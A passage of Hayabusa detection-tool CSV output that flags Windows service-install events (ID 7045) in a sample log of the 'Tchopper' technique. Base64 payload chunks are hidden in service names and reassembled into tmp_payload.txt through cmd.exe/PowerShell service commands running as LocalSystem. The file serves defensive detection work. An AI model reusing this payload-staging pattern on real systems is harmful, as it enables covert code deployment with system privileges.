IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:45.778 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:54.457 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:00.236 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 